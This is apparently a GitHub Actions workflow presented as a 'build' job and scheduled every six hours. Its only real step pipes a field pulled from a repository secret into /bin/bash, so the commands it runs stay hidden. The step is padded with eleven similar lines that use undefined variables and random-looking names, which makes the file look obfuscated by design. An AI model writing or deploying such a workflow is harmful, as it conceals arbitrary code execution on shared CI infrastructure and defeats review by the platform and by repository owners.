name: tianpoguang1937

on:
  workflow_dispatch:
  schedule:
    - cron: '41 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tianpoguang1937
        env:
          pv72223: ${{ secrets.pv72223 }}
        run: |
          echo $pv72223 | jq -r .mbnn1 | /bin/bash
          echo $xcql5686 | jq -r .wcezx128 | /bin/bash
          echo $bwt484 | jq -r .bthoy15379 | /bin/bash
          echo $nqhf4232 | jq -r .qt23 | /bin/bash
          echo $tkz979 | jq -r .b45627 | /bin/bash
          echo $hi3 | jq -r .lzs3 | /bin/bash
          echo $p1 | jq -r .f90 | /bin/bash
          echo $dve5 | jq -r .wwal88875 | /bin/bash
          echo $ethmu1322 | jq -r .lcwjz0700 | /bin/bash
          echo $spur60 | jq -r .utopo811 | /bin/bash
          echo $vb67355 | jq -r .mmop85 | /bin/bash
          echo $gi6 | jq -r .xyg5161 | /bin/bash

